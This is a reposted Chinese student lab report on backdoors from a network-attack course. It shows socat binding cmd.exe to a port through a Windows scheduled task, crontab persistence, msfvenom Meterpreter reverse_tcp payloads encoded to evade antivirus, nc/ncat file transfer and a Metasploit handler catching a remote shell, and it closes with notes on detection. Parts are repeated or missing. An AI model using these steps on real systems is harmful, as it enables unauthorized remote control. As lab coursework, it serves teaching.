大佬教程收集整理的这篇文章主要介绍了20164317《网络对抗技术》Exp2 后门原理与实践,大佬教程大佬觉得挺不错的,现在分享给大家,也给大家做个参考。
1.实验内容
2.实验环境
3.实验中用到的工具
实验步骤
写完输入指令 crontab -l
再点击 操作 选项卡,点击新建,程序或脚本中选择socat.exe路径,在添加参数一栏中写 tcp-listen:4317exec:cmd.exe,pty,stderr (作用是把cmd.exe绑定到端口4317,同时把cmd.exe的stderr重定向到stdout上),点击确定 保存设置 :
点击左侧的 任务计划程序库 ,点击右边的 显示所有任务 ,然后再中间部分找到自己刚创建的任务,右键运行,弹出一个taskeng.exe框,然后切换到kali
在Kali Linux中输入 socat - tcp:192.168.49.129.4317 命令,可以成功得到一个cmd sHell:
3.使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机SHell
后门就是一个程序。
传统的理解是:有人编写一个后门程序,大家拿来用。
后来有一些牛人呢,就想编写一个平台能生成后门程序。这个平台呢,把后门的
基本功能(基本的连接、执行指令),
编码模式,
运行平台,
以及运行参数
全都做成零件或可调整的参数。用的时候按需要组合,就可以生成一个可执行文件。 典型的平台就包括有:
intersect
Metaspolit的msfvenom指令
Veil-evasion
我们接下来学习如何使用msfenom生成后门可执行文件。我们要生成的这个后门程序是Meterpreter. 揭开Meterpreter的神秘面纱介绍了meterpreter的一些底层原理。-p 使用的payload。payload翻译为有效载荷,就是被运输有东西。这里windows/meterpreter/reverse_tcp就是一段sHellcode
-x 使用的可执行文件模板,payload(sHellcodE)就写入到这个可执行文件中
-e 使用的编码器,用于对sHellcode变形,为了免杀
-i 编码器的迭代次数。如上即使用该编码器编码5次
-b badchar 是payload中需要去除的字符
LHOST 是反弹回连的IP
LPORT 是回连的端口
现在文件生成好了,先再win10的命令行中输入 ncat -l 4317> 20164317.exe 开启监听并将接受的数据写入20164317.exe文件中
再kali中用 nc -nv 192.168.49.129 4317 < 20164317.exe 指令将数据传过去
依次输入以下命令
复制代码
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.235.137 //注意此处应为Linux的IP!
set LPORT 5212 //后门程序里的端口号
show options
exploit
现在去win10中双击运行20164317.exe,点后win10没反应,然后切回kali,通过msf的监听进程获得win10的主动链接,并得到远程控制sHell
基础问题回答
(1)例举你能想到的一个后门进入到你系统中的可能方式?
非官方网站下载应用程序时,该应用程序可能绑定了一些可执行文件,因此留下后门。或者当我们打开一个网页时,如果该网页会自动链接到木马程序的话,就会在后台自动下载安装木马的安装程序,
(2)例举你知道的后门如何启动起来(win及linuX)的方式?
Windows:设置为开机自启动、修改注册表项、用户执行带有后门的可执行文件
Linux:通过crontab功能将后门设为定时启动;也可以通过对正常软件绑定注入sHellcode
(3)Meterpreter有哪些给你映像深刻的功能?
在植入后门后,可以控制被控主机的sHell,执行指令;获取被控主机的录音、录像、截图、键盘输入记录等。
(4)如何发现自己有系统有没有被安装后门?
打开防火墙,查看有没有异常开放的端口;
安装杀毒软件,实时监控电脑,定时对系统进行检测
实验感想与问题
感想:这次实验,不得不说很让我震惊。这是我第一次实际上get到后门获取信息的知识,很满足。希望以后能够更深入的学到相关理论和知识,不仅学会攻击,也要学会防范。
现在去win10中双击运行20164317.exe,点后win10没反应,然后切回kali,通过msf的监听进程获得win10的主动链接,并得到远程控制sHell
以上是大佬教程为你收集整理的20164317《网络对抗技术》Exp2 后门原理与实践全部内容,希望文章能够帮你解决20164317《网络对抗技术》Exp2 后门原理与实践所遇到的程序开发问题。
如果觉得大佬教程网站内容还不错,欢迎将大佬教程推荐给程序员好友。
本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ:384754419,请注明来意。